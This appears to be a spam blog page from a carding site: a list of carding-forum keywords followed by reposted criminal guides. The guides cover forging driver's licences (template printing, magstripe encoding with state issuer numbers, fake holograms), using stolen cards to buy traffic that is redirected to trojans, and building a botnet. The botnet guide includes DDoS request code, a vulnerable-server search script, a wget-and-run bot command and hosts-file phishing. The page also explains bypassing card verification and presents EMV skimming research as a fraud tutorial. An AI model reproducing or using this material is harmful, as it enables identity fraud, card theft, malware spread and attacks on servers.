Monday, January 10, 2011

www.cardersunion.net carding forum carders boards

carding forum
carding forums
card forum
credit card hackers forum
cards talk forum
russian carding forums
carders forum
carder forum
underground carding forums
discussion board software
smiley smile message board
cards forum
card maker forum
carding forum 2009
credit card dumps forum

discussion forums software
best free forum
carder forums
free discussion boards
free message board software
best carding forum
web forum software
card forums
credit card hacking forum
business card forum
discussion forum software free
message board system
calling card forum
card forum 2010
free n gage games for n95
software message boards
card forum and expo
free forum template
carders forums
debit card forum
credit card hack forum
forum board software
free message board script
free message board html
simple forum software
lava carding forum
card model forum
swamp gas forum
threaded discussion board
carding forums 2010
credit card dump forum
free private message board
credit card hacking forums
php forum code
invision power board 2
open source web file manager
software for forums
greeting card forums
best message board software
bollywood movies for mobile
credit cards hackers forum
tamil movie 2009
22nd annual card forum and expo
sound card forum
credit card numbers forum
latest english music
greeting card forum
card game forum
zee tv videos
debt credit card forum
hack credit card forum
credit card number forum
free message boards forums
death valley driver board
free forum website templates
credit card generator forum
free message sites
new released hindi movies 2009
trade steam accounts
tv tuner card forum
credit card fraud forums
stolen credit card forums
free chat boards
simple message board script
avatar message boards
hindi dvd rips
php image verification
latest eng songs
vb arcade
zee tv serial songs
free forum community
forum cards
web app creator
free simple forum
open source web editing
carding cvv2
smiley smile forum
open source message boards
vb send message
free forum application
russian carding forum
free phpbb board
bollywood dvd rips
card share forum
card games forum

fake id cc

kay, in light of recent events, people asking me to make them ID’s, people being stupid, and me having to much time on my hands, I have decided to write this guide for you, the moronic teenager who wants to make a fake ID.


First let me say everything in this guide is to be taken in a hypothetical sense and none of it is meant to be taken in a literally nor is it meant to be carried out. Anything you do with this information is your responsibility and I’m not responsible for you being an idiot and getting arrested.


Alright now let’s get started. I will first run down the things that you will need. I am going to tell you what you need to make a professional looking state driver lisence, you may not need all of this but it is what is needed to make it look real if you don’t use something that I tell you to it’s your call, your ID may end up looking different than it should.

• Photo editing software (I personally suggest Adobe Photoshop 6.0 or above)
• Prior knowledge of Photoshop is a must
• State identification template
• A scanner if you need to scan a photo of yourself
• Epson printer (c82 or 820) or a laser printer
• Laminator
• Teslin (Type of teslin depends on what kind of printer you have)
• Magstrip encoder (not a nessecity but to make a professional identification card it is needed)


They’re may be other supplies that you need depending on what state you do, and if it has a hologram, that will be explained later in the article.


Okay the first step would be to get a template, these are readily available in more than one place IF you know where to look. Me being the nice guy that I am will help you with that factor. Just search a search engine (google?) www.google.com or any p2p program should be more than sufficient, otherwise you may know somebody who will sell them to you or trade them. There are of course other options, you can make your own, which of course entails tedious work, taking days or even weeks. Or you could scan an ID that you already have and edit it that way.

Okay so let’s say you have your template and you have photoshop, it’s time to get crackin’.

So you need to open up photoshop, and start editing your information. Get your picture in the box and resize the image so you can print.

When it comes time to print it may be a bit difficult.

I am going to assume that you are using single sided Teslin. You will first need to find the coated side of the Teslin paper, now this may take a little bit of experience to figure it out. The correct side is a bit smoother than the other. Just put it in between you fingers and rub the paper until you figure out what side is smoother, if you cant figure it out it’s not a problem, you’ve got a 50% chance of getting it right. You will know weather or not it was right after you print for obvious reasons, the ink will bleed and look really bad. In which case you just flip it over and print it on another position on the teslin.

After you have the right side picked out , you might want to mark the corner with a pen. Then place the teslin in the printer so that it will print on the correct side
Configuring the 8up Template
Now that you are ready to print, you will need the 8up Teslin Template. You can download it here.
After you download it, unzip it and open it in Photoshop. Open your finished template as well. Before you can print, you need to check the resolution of the temp you are using and match the 8up temp's resolution to it. To do this, click on the window of your template to make it active, go to the Image menu and click Image Size. Look at the Resolution. It should have a number like 1200 pixels/inch. That is the DPI of the temp you are using.
Now, switch over to the 8up temp that you should already have open. Go back to Image Size under the Image menu. Make sure the Resolution is the same between the two temps. The 8up temp I have hosted here on this site is already in 1200 DPI, but if you have downloaded it from somewhere else in the past (such as Brainstorm ID Supply), it may be in 600. If it is not the same, type in the number it should be and click OK. Photoshop will then convert the 8up temp to the correct resolution.

Copying and Pasting on to the 8up Template
Activate the window of your front template in Photoshop. Under the Select menu, click All. Go to the Edit menu and click Copy Merged. You should copy it merged since you won't need all those layers just to print.
Switch over to the 8up temp and go back to the Edit menu and click Paste. You should now have a new layer in the 8up temp containing your front temp. Select that layer (if it isn't already selected) in the Layers window. Select the Move tool by either clicking on it in the Tools palette or by pressing V. It will help if you check the box next to Show Bounding Box at the top. If you don't see this option, go to the Window menu and click Options.
There are 8 rectangles on the 8up temp (hence the name). Decide where you want to print the front of the license. When I've got a blank sheet of Teslin, I start by printing the front in the top left. Move the layer to the rectangle where you want it to print. Do this by simply dragging it with the Move tool. It should snap into place inside the rectangle. Hopefully, it will be the correct size, but if it isn't you may need to resize it to fit inside the rectangle by dragging the borders. Remember how you checked the Show Bounding Box option? This is why.

Adjusting Print Settings
Click Print under the File menu. Click Properties. Now you must adjust the print settings to match the printer and the Teslin (single or double sided). Here are some settings that I recommend for the printer that I use:
Epson 820 - Single Sided Teslin - Front:
* Under Mode, Choose Custom
* Click Advanced
* Media Type: Photo Paper
* Ink: Color
* Print Quality: Photo - 2880dpi
* Color Management: No Color Adjustment
* Uncheck Edge Smoothing
* Uncheck Epson Natural Color
Epson 820 - Single Sided Teslin - Back:
* Under Mode, Choose Custom
* Click Advanced
* Media Type: Matte Paper - Heavyweight
* Ink: Black
* Print Quality: Photo - 1440dpi
* Color Management: No Color Adjustment
* Uncheck Edge Smoothing
* Uncheck Epson Natural Color
Epson C82 - Laser Teslin - Front:
* Choose Matte Paper - Heavyweight
* Choose Photo RPM
* Uncheck all print options except SuperMicroweave
* Select PhotoEnhance
* Set Tone equal to Vivid
* Set Effect to High Sharpness
* Turn Digital Camera Correction off
Epson C82 - Laser Teslin - Back (Assuming the back is only black, if not use the front settings):
* Choose Matte Paper - Heavyweight
* Choose Best Photo
* Check Black Ink Only
* Uncheck Edge Smoothing

Printing the Front
After you've adjusted the settings to your liking, it's time to finish up and print the front. You should still have the Print window open, but if not go back to Print under the File menu. Now all that is left to do is click OK. Just sit back and wait because it will take a few minutes. After it's done printing, let it dry for a couple of minutes before you touch it. You wouldn't want to smear the ink on that great looking novelty you just printed, would you?

Printing the Back
Now it's time to do the back. The procedure is nearly the same as printing the front. The only differences are where you place the back temp layer on the 8up temp to print, the side of the Teslin you print on, and (if you are using single sided Teslin) the print settings that you use.
Follow the steps in this guide the same way you did for the front, until the part about placing the layer on the 8up temp to print. You will want to put the back temp in the rectangle that was to the right or left of the rectangle you printed the front temp from. For example, you printed the front temp by placing it in the top left rectangle on the 8up temp. In this case, you'll want to put the back temp in the top right rectangle. You will need to flip over the Teslin so that the back will print on the opposite side of the front. Use your common sense, and think about how the printer feeds the paper through.
Adjust the print settings if you are using single sided Teslin, or for double sided, check to make sure they are still the same. Now you are ready to print it.
If you did everything right, you should end up with a front and back that look great and are aligned perfectly (or at least very close
The following information was borrowed from an article written by The Jerm
This is a basic guide to encoding the magstripe on driver licenses/ID’s. First, you need to have an MSR206 magstripe encoder. If you don't have one already you can find them easily through an internet search or eBay. It'll run you about $600. Okay, now you need some software. You can download my program for free at http://thejerm.0catch.com. I won't cover how to use the software here. It's pretty self-explanatory but if you run into any problems just read the readme.txt file that comes with it.
Driver License/ID Encoding
If you want to encode an ID there are two ways to go about it:
1. You can read the magstripe from a real ID and then manually edit the tracks. Here's an example of track 1 from an Arizona license:
AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
Now, if your name is Joe Blow and you live at 123 Fake St. in Tuscon you could easily change it to:
AZTUCSON^BLOW$JOE^123 FAKE ST^
If you just want to change the birth date it can be found at the end of track 2 in this format: YYYYMMDD. Most states follow the AAMVA standard pretty closely. The AAMVA standards document can be downloaded here:
http://aamva.com/Documents/stdAAMVAD...ecs_092003.pdf
2. You can use the built-in ID tracks generator in my program. Unfortunately for most of you I’ve only included the formats for CA and AZ. If you want to do a little work you can create a script for your own state’s format. The instructions for doing that are in the readme.txt file that comes with the program. I’d recommend copying the AZ script and editing it rather than starting from scratch.
AAMVA Format
Here’s a rundown of the AAMVA format with each part color coded for easy reference:
Sample:
AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
6360260401234567=380719800711=
!!85023 D M601185BRNGRN
Track 1:
AZPHOENIX^ADAMS$JOHN$QUINCY^1433 N ELM ST$APT 3^
AZ – State Abbreviation. Fixed length of 2 characters.
PHOENIX – City. Maximum length is 13 characters. If city is less than 13 characters it must be followed by ^ field separator. If city is more than 13 characters it is truncated to 13. No ^ needed if city is 13 characters long. Examples:
PHOENIX^
SANTA BARBARA
SAN LUIS OBIS (San Luis Obispo)
ADAMS$JOHN$QUINCY – Name. Maximum length is 35 characters. If less than 35, must be followed by ^ field separator. Each name is separated by $. Format is LAST$FIRST$MIDDLE or LAST$FIRST if no middle name is used.
1433 N ELM ST$APT 3 – Address. Maximum length is 77 minus the total number of characters of City + Name fields. $ is used to separate address lines. If address is less than 29 characters it must be followed by ^ field separator.
Track 2:
6360260401234567=380719800711=
636026 – Issuer Identification Number (IIN). Every state has a unique IIN. IIN is 6 digits long and starts with 636. A list of some of the IIN’s is included at the end of this guide.
0401234567 – License/ID Number. Maximum length is 13 characters. If number is longer than 13 characters, extra characters are placed at end of track. If license/ID number contains letters, they are converted to 2-digit number (A=01, Z=26). For example, the sample number I used was D01234567 but got converted to 0401234567. License/ID number must always be followed by = field separator regardless of length.
3807 – Expiration Date. Format is YYMM so this example expires in July of 2038 (AZ licenses expire on 65th birthday). Some states may use special codes in place of the expiration month. Codes are as follows:
If MM=77 then license is non-expiring.
If MM=88 the expiration date is after the last day of birth month one year from the month (MM) of birth date and the year (YY) of expiration date.
If MM=99 then the expiration date is on the month (MM) and day (DD) of birth date and the year (YY) of expiration date.
19800711 – Birth Date. Format is YYYYMMDD so this example is July 11, 1980.
= – License/ID Number Overflow. If License/ID number is longer than 13 characters extra characters go here, otherwise a = field separator is placed here.
Track 3:
!!85023 D M601185BRNGRN
!! – Unknown. These two characters don’t seem to conform to the AAMVA standard and the standards document contradicts itself. It’s probably safe to copy whatever’s in this spot on a real ID.
85023 - Zip Code. Fixed length of 11 characters. If Zip Code is less than 13 characters add spaces to make it 13.
D - Class. Fixed length of 2 characters. If only 1 character add space.
(10 spaces) – Restrictions. Fixed length of 10 characters. If not present fill with spaces.
(4 spaces) – Endorsements. Fixed length of 4 characters. If not present fill with spaces.
M – Sex. Fixed length of 1 character. M for male, F for female.
601 – Height. Fixed length of 3 characters. Feet and inches. Sample is 6’1”.
185 – Weight. Fixed length of 3 characters. Weight is in pounds. If less than 100 lbs. use 0 for first character.
BRN – Hair Color. Fixed length of 3 characters. Examples are BRN, BLN, RED, BLK.
GRN – Eye Color. Fixed length of 3 characters. Examples are GRN, BLU, HZL, BRN.


There may also be some discretionary data unique to each state at the end of track 3. One more thing, make sure you set the track format to AAMVA under Card Types on the Settings tab or you may get an error when you try to write to a card.
Issuer Identification Numbers
Alabama 636033 Louisiana 636007 Nova Scotia 636013
Arizona 636026 Maine 636041 Ohio 636023
Arkansas 636021 Maryland 636003 Oklahoma 636058
British Columbia 636028 Massachusetts 636002 Ontario 636012
California 636014 Michigan 636032 Oregon 636029
Colorado 636020 Minnesota 636038 Pennsylvania 636025
Connecticut 636006 Mississippi 636051 Rhode Island 636052
District of Columbia 636043 Missouri 636030 Saskatchewan 636044
Delaware 636011 Montana 636008 South Carolina 636005
Florida 636010 Nebraska 636054 South Dakota 636042
Georgia 636055 Nevada 636049 Tennessee 636053
Guam 636019 New Brunswick 636017 US State Dept 636027
Hawaii 636047 New Hampshire 636039 Texas 636015
Idaho 636050 New Jersey 636036 Utah 636040
Illinois 636035 New Mexico 636009 Vermont 636024
Indiana 636037 New York 636001 Virginia 636000
Iowa 636018 Newfoundland 636016 Washington 636045
Kansas 636022 North Carolina 636004 Wisconsin 636031
Kentucky 636046 North Dakota 636034
That’s about it. Good luck!

I realize this guide is getting a bit long but we’re almost done.

The holograms in my opinion are the worst part of the entire process, it may just be me but I am not a big fan of this, for others, it’s the exact opposite, but I will still give you the information. There is more than one method to making holograms, and for the sake of time will not go over them all, maybe in the future I will make another guide including them all, but for right now I will just cover one of them.

Many of you may know what method I will be telling you about, and your sitting there thinking PhotoEZ, well your wrong, I don’t like it, in fact, I hate it, instead I am going to tell you about an easier, cheaper way to make your holograms and here it is.

Reffered to as the rubber stamp method The main reason people rule out rubber stamps in this business anymore, is because they think that the only stamps that can be made are the ones you buy at office stores, and only contain letters, numbers, etc. However- in most medium sized cities, there are stamp shops that are able to produce VERY high-quality, detailed stamps, for around 10-20$ The best way to get your CUSTOMIZED stamp made is to print out the hologram you wish to be made, with the exact sizes. Keep in mind how you will be placing the stamp on your medium of choice, be it teslin, lamination, overlam, or whatever. When you print your hologram image out- be sure its not backwards- and tell the stamp producers this too, so when you stamp your teslin, overlam, lam...etc... it shows up facing you, and not like a normal stamp, that would need to be facing the opposite direction on the actual stamp. lol, i hope this part hasn't confused you- because the first couple of times i had stamps made i had to keep making sure it would come out right before i took it in. I suggest you give the stamp producers an example of how you want it done, on your medium of choice so it comes out right, and not in the opposite direction. To find the stamp producers that can take in scanned images (your printed out hologram) and make stamps out of them- just look in your yellow pages under "Rubber stamps" and call them to make sure they can do this process before you go.
Ok, so that was the easy, no talent method for getting great quality rubber stamps. If you are really good w/ art type stuff- and want a semi-hard challenge, goto the art department at your school and kindly ask the teacher if they had some linoleum-print blocks that you could borrow for a project- along with the proper chizling tools to cut out the stamp. Getting these items assumes that you are in highschool, and you have an art dept. w/ these supplies. If not- you could probably just goto an art store and look for the supplies yourself. (as mentioned above- you need a Special chizzle for linoleum block carving, and the linoleum block itself) although I've never needed to do this before- because I'm still in school Now, with your hologram image that you need to print out from your computer- cut out the parts of it that are colored in with an exacto knife, and leave the white parts solid. You now have a stencil, basically. Draw this onto the linoleum block, and make sure things look good...you may have to do some of the drawing without the stencil in the smaller areas, but its not too difficult once you get the hang of it. After this, carve out the areas on the block where there was white on the original printout. I suggest using a small tool for this- so its easier to get into the little nooks and crannies of the holo. When you get the basic outline of everything around your holo, you now need to put a pvc id, or credit card size object over the holo and place it exactly where the holo should be on the id, when you make it. Carve this blank area out, being sure not to cut into the actual hologram, and after this part is done, you're ready to put the interference gold ink on (i suggest pearl-ex + boss gloss embossing gel- for stamps) and do this by mixing the two things together, putting it all on the cardboard back of a notbook, making sure it gets well "inked" then placing your lam, overlam, teslin's inside over it- so it can be stamped, and then its ready to go. Take note- this second method pretty much only works on the NJ holo- as its the easiest, least complex holo out there, however you can also make your own "offical-looking" stamps with this method too.
The easiest method by far for using stamps is to simply have one made at an stamp shop that can make them from scanned images. If you arent very fammiliar with art shit or linoleum block printing I would'nt attempt the second method. I only included it because i was bored one day during art, and decided to "take" a linoleum block and the chizzels, and make myself an NJ holo. All in all, i prefer this method over PhotoEZ, because they come out High-quality and all i have to do is press down the rubber/linolem stamp on the "ink slab" (back of notebook) and then apply it to the lam, teslin or overlam. I hope you'll at least try the first method, as I'm sure you'll find that the results kick ass.

I realize this guide got quite long and I apologize but I hoped you enjoyed reading it as much as I enjoyed writing it. I want to thank everyone who either helped with this text, or created the different methods explained throughout the article.
Once again be responsible with the information held out in front of you.

cc

So, you need traffic and you don’ know how to card it. First of all you need to know that the majority of services don’t let adult content, viruses, trojans, music on a site and the pop-up windows (there are exceptions).So if the traffic with virus you should cheat a little. Payment for the traffic mainly is through paypal. Unverified accounts perfectly passes, but some offices which already have got a lot of fraud demand verified.

It’s easy to make unverified paypal account, if there is a little a grey substance, a couple of good socks and ccs. For example I usually make an account this way:

1. I go to Google, and write "paypal donation"

2. I find a suitable site, do the donation for the small sum. Then I press next and pass to page of payment by paypal.

Further I fill all fields with a name, address, e-mail etc. One advice: open the account on the countries like Spain, Israel, Japan. Never make it on the countries like USA, UK, Germany as level of antifraud such accounts is higher, and the system will suggest you to enter the data not only of your card but also on the bank account. E-mail is better to use not known well and of course on good prepared system.

3. If the card good and socks also good that problems do not arise and you will see on the next page that payment has passed, and the button where they offer you to save the data and to make an account. Press it, fill the password, confirm soap and everything, unverified the stick at you already is with a limit in 750$ in a month.

4. Further if the traffic for virus that you should card domain and hosting, hang up absolutely harmless content something like partner program on software sale.

5. Then go to Google, write "buy traffic, visitors, advertising". We choose more pleasant offices and I am dispatched in support letters of the maintenance of type I wish to buy from you the traffic, give the list of the countries and ask how many approximately unique a day they can send.

The traffic shares on a category
Untargeted
Country targeted
category targeted
Language targeted
Adult traffic

There are also mied packages traffic (country targeted + category targeted)

Further all is simple. Wait for support answer, choose the package you need, pay by paypal and specify url of your site. The order passes in a stage "pending" when the administrator should check up a site content on presence of viruses, an illegal content etc)

After the administrator will give green light and traffuc will start to drip on yours side do redirect from this site on a site with trojan and we enjoy loadings. If the office sends big volumes that is risk that the administrator will want to recheck later url once again and in case of detection virus will close acc. The content is better not to change the first days.

There are offices which accept for payment a cardboard, more often through 2checkout. Here all is much easier also paypal is not necessary. Some offices are compared info on the domain with info which by you have specified at the order. It is a lot of difficults, but there is nothing impossible.
Report to moderator 173.2.22.145 (?)
Pages: [1]
Reply | Notify | Add poll | Send this topic | Print

hackers forum board cc carding

Security systems are constantly improving, programmers will melt more skilled. Now it is supposed ever less widely known errors.

[Prologue]
The Internet grows with great force. It becomes more difficult for hacker to search for vulnerabilities. Administrators use for working developments of best security experts. See your thoughts? Actually on the Internet a lot of bags, but usually it’s useless. Here, imagine a situation, you were got by any network mongrel, you wish him to be punished. Today we will talk about creation own botnet.

So that is the bot. Uninitiated person images stupid enemies in computer games which you shoot down for two minutes. Yes, it’s partly so. In our case "bot" is a program which executes included in it commands. Seems nothing especial. Someone will object: "I supposedly in five years have written such thing, press a button and the program, olja-lja, is closed" - forget the childhood. All of us know that possibilities of coding are boundless, and you can use it for good and harm. Of course we always use our workings out with good intentions. Botnet is a set of bots connected in the centre which synchronously execute commands of the owner. Bots, by the way, basically are aimed more on Windows cars. Here you can stea; passwords, make socks, format hard disk. I will depart from rules and I will tell how to create botnets from nix systems. Basic function of our boat - is DDOS attacks. It’s the best way to use big channels of nix servers. Let’s count. Server you need to make down uses 100Mb channel. So 10-20 bots standing on the same channel will fill up a server in a moment.


[Writing a bot]
You will find listing of example of bot in the link at the end of article. So let’s see the code. You can control your botnet by IRC or web. The control through IRC has been chosen fir its interactivity. For example I want to root by local kernel sploits a couple of servers in botnet. I just simply execute command SH uname – and by bot I’ll find the computer I need in a moment. Then also having executed a command in IRC the client, I will load backdoor and I’ll receive an interactive shell for the further actions. Possibilities are boundless. You’ll say – it’s possible and through WEB, but what for to reboot a page and to spend the traffic? More convenient to observe all in real time (if there arre 1000 bots or more, it is possible will take care of convenience of the interface - a comment of sensible mind). A lot of people think that organization of DDOS-attack is very difficult. Here an example of code of usual attack:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n

So we simply send inquiry to a server forcing it’s answer. And we send it till the server will be down from shortage of the traffic or processor time. But you can’t use only nix bots, it is necessary to create and windows-botnet, for example, with AgoBot. For this purpose it will be possible to create a certain code for a bot which to scan on a subject lsasl/dcom vulnerability systems which connect to a server which the bot is established on.


[Creating botnet]
Actually to create botnet is very easy. For this purpose we need to find vulnerability in any web script. Founded vulnerability must allow to execute commands shell-interpretation . When you will find vulnerability, pay attention to the name of a file with bug, its header and the name of vulnerable system. Now, by this data, we need to make good search inquiry. For example, take all known vulnerability in phpBB <=2.0.10. The file’s name - viewtopic.php, a variable showing on meaning of forum’s topic - t. So the search inquiry will be like "Powered by phpBB AND viewtopic.php? t =". More reasonably and easier you will make inquiry - more vulnerable servers will fall into your trap. Each search server has unique language of inquiries, so esteem its description before making inquiry. Now it is necessary to automate all it. On Perl we’ll make such sending of inquiry: $sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next;
print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);

Further, we do filtration of results and run exploit. Exploit must execute a command of start of our bot.

wget http://_server.org/bot.c; gcc bot.c-o bash; chmod +x bash;./bash;

Here we can see too problems. Wget and gcc can not appear or their using can be forbidden. Here downloaders fetch, curl and get will help us. Or console browser lynx or ftp protocol. But it’s realization is more difficult – but plus is tha ftp is everythere. As to compillator you can just make binary on your shell and hope that all will be ok ). Or rewrite bot on interpretated languages – Perl or PHP.

Phishing
It’s very convenient to use bot for phishing organization. We need special optimized pages (which is copying an original site we need), good hosting, or dedicated server or VDS. You can find such pages in the internet or buy or make it by yourself. Mainly it’s copies such sites as paypal.com, moneybookers.com or smth like thos connected with money. Further windows-bot copies a file \system32\drivers\etc\hosts adding to ip IP address of your server and connected it with needed domain name for eample paypal.com. And when user types in his browser paypal.com he see your page on your server – he types login and password there and then it logged in place you need. But if user uses proxy server it won’t work.

cvv dumps

What is it?

These are the systems created by companies Visa and MasterCard for additional verification of online transactions.

How they work?

At attempt of fulfilment of transaction in online shop or any other system accepting credit cards for payment, connected to these systems (their quantity grows every day and it is defined basically on logos VBV and MCSC on the main page of a site), appears the offer to enter the password on transaction or to activate VBV or MCSC.

How these systems are activated?

On
http://usa.visa.com/personal/security/vbv/index.html
And
http://www.mastercard.com/securecd/welcome.do
You enter number of a card and answer the put questions. As a rule, they include inquiry SSN, DOB, CVV, ZIP, sometimes MMN. After the answer to questions you are allowed to set the password on transaction.

What to do in case of already activated VBV or MCSC?

At the offer to enter already existing password on transaction which you, do not know - it is necessary to click on a link "Forget Password?". Then you get on standard procedure of restoration of the password, including the same questions, as at activation VBV or MCSC.

Whether the card with is valid activated VBV or MCSC?

Yes, certainly. If necessary it is possible to restore the password on transaction.

What benefit carder from VBV and MCSC?

At password input on transaction, responsibility for fraud actions bears not shop, and bank. Therefore at activated VBV or MCSC any system considerably reduces antifraud and passes payment.

carding forum

Hallo All,
I'd like to tell You something in POS skimming but first..
I'm student of electronics and mechanisms, I can offer You some knowlage.. nowadays/soon ATM skimming will be more risky, Police and Depatments hardly working and Banks teaching customers how recognize skimmers and fake keypads or hidden cameras. Lets start the article, if somebody would like some help in that should contact me via email or pm.

Introduction

The EMV1 protocol suite hxxp: the technology underlying "Chip and PIN" hxxp: has now existed in one form or another for over ten years, though it has only been deployed in Europe for less than two years. Over this period there have been plenty of hypothetical attacks and fixes to the protocol in turn, yet it is only since deployment that there has been enough clarity to fully explore possible weaknesses both at a design and implementation level. In this paper, we look at the big picture of EMV, exploring the feasability of attacks exploiting the fundamental shortcoming of smartcard-based systems hxxp: lack of a trusted user interface. We then look at technical errors in the detail, specifically at how the bank's security API to receive and process messages from chip cards implements the required functionality; we show that several vendors have tripped up here. Finally we consider brand new attack modes that may become important in the future (once the easier vulnerabilities have been counteracted), specifically looking at combining technical sabotage attacks with the ever-problematic phising phenomenon. We hope that this whistle-stop tour shows that whilst EMV is undeniably a robust and secure payment protocol at heart, there is so much matter and

(*) EMV is named after the original contributing corporations: Europay, Mastercard and Visa

complexity around the edges to get wrong that there will be plenty to keep the criminals fed and watered in the future; we look forward in particular to phish and chips ! Section 2 of this paper describes eavesdropping and relay attacks, section 3 describes API attacks at the back end, and section 4 considers phishing attacks. We conclude in section 5.

2 Eavesdropping & Relay Attacks

While a smartcard is a very convenient form-factor to carry, it lacks a trusted user interface, unlike for instance a mobile phone. This means the PIN cannot be provided directly to the card, so there is the possibility of eavesdropping en-route. Lack of trusted display means there is no way to confirm who you are doing business with, and what amount is being transacted, so it becomes possible to relay the entire data stream to another location. Let's look at these two well-known drawbacks in more detail. 2.1 Eavesdropping POS Terminals

If account and PIN data can be eavesdropped from an EMV transaction at a Point-Of-Sale (POS) terminal, it is easy to make a magnetic stripe card containing that data, for fraudulent use in a foreign country where EMV is not supported. Eavesdropping equipment is already commonplace for unmanned ATMs, usually consisting of a overlay for the card slot and a concealed camera. However there are multiple approaches to eavesdropping POS equipment, each with advantages and drawbacks: hxxp: Camera and Double-swipe. The most basic approach requires a collusive merchant. The merchant positions a camera with view of the PIN pad, and secretly swipes the card through his own equipment before inserting it into the genuine device. hxxp: Hacked Terminal. A real POS terminal is opened up and additional circuitry/probes are added to monitor the keypad, and record the data from the smartcard. hxxp: Counterfeit Terminal. The shell of a genuine POS terminal is used to make a counterfeit, which appears to accept card and PIN, but performs no transaction. Alternatively the counterfeit may pass on the data stream from the smartcard to a hidden genuine terminal, but a physical actuator system to enter the PIN on the real terminal may be required. hxxp: Terminal Skimmer. A miniaturised interceptor device can be overlayedThe camera and double-swipe approach is definitely workable, but a significant disadvantage is the level of collusion from the merchant required, in order to set up the camera and conceal the second magstripe reader. In addition, a human must go through the video footage study the PINs entered, then correlate with the captured data, which is time consuming and error-prone. Modifying a working terminal requires bypassing of the tamper-resistance, and though this is unlikely to be of a high standard, the attack is still technically very complicated, and requires considerable manual effort for each terminal sabotaged. The counterfeit terminal approach is appealing, and scales better than a hacked terminal. However the effort required to program a brand-new terminal counterfeit (particularly to drive the receipt printer and LCD display) is substantial. It works well within the business model of giving the customer a free lunch in return for his card and PIN data, but ideally the corrupt merchant would like to mix genuine and counterfeit business over the course of the day. Setting up solenoid actuators so that the PIN can be forwarded is a further complication. In all, our preferred approach in terms of cost, development time and convenience is to create a skimming device which sits on the smartcard slot, and captures card and PIN data. We created a prototype device using an EZ-USB microcontroller and laptop computer, costing in total comfortably under $100, in development time of approximately one man-month. Our prototype is:

http://img133.imageshack.us/img133/9...mmerww8.th.jpg

on top of the smartcard slot on the POS terminal. From this position it can intercept the smartcard stream (capturing account details), and also the PIN. The PIN can be captured here because most European systems are using the cheaper Static Data Authentication EMV cards, which possess no private key, thus the PIN can only be sent in the clear.

2.2 Smartcard Relay Attacks

Eavesdropping attacks collect account and PIN data for use at a later date, but rely on the magnetic stripe fallback mode of operation, something which might one day be discountinued (though it is unlikely). However if the attackers are well-prepared, they can use the access to the customer's card and PIN in real-time: this is called a relay attack. For example, as you pay for a meal in a dodgy restaurant using your chip card, the waiter's sabotaged reader could simply forward all the traffic from your card wirelessly to an accomplice at a jewellers on the other side of town. The smartcard data stream would go maybe via GPRS to a PDA in the crooks pocket, then to his fake card, and the captured PIN read out via a headphone in his ear. You think you're paying for lunch, but in fact you're buying the crooks a diamond! This sort of relay attack is a variation on the counterfeit terminal eavesdropping attack, and we imagine the equipment reqired to deploy it would cost less than $2000, though substantial development and debugging time would be required.

more in next thread..

POS skimming (2)
3 Back-end API Attacks

Back at the bank data centre, a rack of Hardware Security Modules (HSMs) are tasked with providing the back-end support for EMV cards in the field. There are two ma jor roles: processing authorisation requests and responses, and sending secure messages. An authorisation request or response is simply a MAC over specific transaction data fields, constructed using a specially derived 3DES key shared between HSM and smartcard. A secure message can be thought of as an authenticated script command sent to a card, which usually acts to update some internal variable in the smartcard's non-volatile memory. Secure messages can have encrypted fields, for instance so that a new PIN can be securely sent to the card. 3.1 EMV Secure Messaging in the IBM CCA

IBM's Common Cryptographic Architecture is a popular security API implemented by IBM mainframes and in the 4758. As part of our study of EMV, we looked at the recently-added support for EMV transactions in both the CCA API and the Thales RG7000 series API. We found several vulnerabilities in the support for secure messaging, which are described in detail in a forthcoming paper [2]. These attacks are significant because they show that the EMV protocol has not mitigated the risks of abuse by bank programmers at operations centres, and insider attack there can rapidly undermine the system. We now briefly describe the attack on the CCA's Secure Messaging For Keys, which allows us to extract secret keys (and PIN updates) being sent to a smartcard, and inject our own keys and messages without authorisation. The CCA command Secure Messaging For Keys is basically a special kind of key export. It takes a key stored locally on an HSM, decrypts it, then formats it up as part of a secure message. This secure message format is specified by template input arguments to the command hxxp: consisting of a template and and offset at which to insert the encrypted data. The command then re-encrypts the message under a specially derived key shared between the HSM and the destination smartcard. Finally, a separate command MAC_Generate is used to create an authentication code over the whole message. Here is the Secure Messaging For Keys call in detail:

template , offset , {K1 }KM /T , {K2 }KM /SMSG - {template [K1 : offset ]}K2 hxxp: template : the message template, a byte-string to be used in preparing the plaintext. hxxp: offset : the offset within template where the key material should be placed. hxxp: {K1 }KM /T : K1 is the payload hxxp: a key to export to the smartcard. K M /T represents an encryption key used to store the payload key locally. hxxp: {K2 }KM /SMSG : K2 is the key shared between HSM and EMV smartcard. This is used to encrypt the confidential data within the secure message. hxxp: template [K1 : offset ]: represents the template plaintext template interpolated with key material K1 at offset offset . hxxp: {template [K1 : offset ]}K2 : the finished result hxxp: an encrypted secure message consisting of template with K 1 interpolated, all encrypted under K 2. 3.2 Construction of an Encryption Oracle

Our injection and extraction attacks work by gaining access to an encryption oracle. We first note that the CBC mode used in Secure Messaging For Keys has an unfortunate malleability property: a ciphertext can be truncated to create a ciphertext of an identically truncated plaintext hxxp: so long as the truncation is block-aligned. Thus, we can thus construct an encryption oracle for an arbitrary input message m as follows: EncryptionOracle p laintext , {K2 }KM /SMSG :

1. create a template template by extending plaintext by a single block, e.g. the 0-block. 2. set the offset to |plaintext |, which is effectively the beginning of the 0-block just added.

3. perform the call to Secure Messaging For Keys using any available exportable key {K1 }KM /T : plaintext ||"00000000", |plaintext |, {K1 }KM /T , {K2 }KM /SMSG - c the HSM will fill in the last block template (as indicated by offset ) with K1 , leaving the entire plaintext component of template untouched. 4. consider the first |plaintext | blocks of c, effectively discarding the last block. This truncated value is simply {plaintext }K2 , our desired result. This very straightforward observation undermines any security merits of the template-fill-in operation of the HSM hxxp: the programmer might as well be able to use the special wrapping key shared between HSM and card in a conventional Data_Encrypt command.

3.3 Extracting Keys
